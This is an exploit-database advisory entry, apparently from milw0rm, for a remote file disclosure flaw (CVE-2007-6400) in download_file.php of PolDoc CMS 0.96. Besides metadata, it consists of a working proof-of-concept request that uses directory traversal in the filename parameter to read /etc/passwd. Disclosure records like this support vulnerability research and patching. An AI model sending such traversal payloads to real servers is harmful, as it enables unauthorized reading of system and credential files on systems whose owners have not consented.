[] NeoSense

PolDoc CMS 0.96 - 'download_file.php' File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-12-07 
date_updated:  
verified: 1 
codes: OSVDB-39503;CVE-2007-6400 
tags: 
aliases:  
screenshot_url:  
application_url: 

PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd

# milw0rm.com [2007-12-08]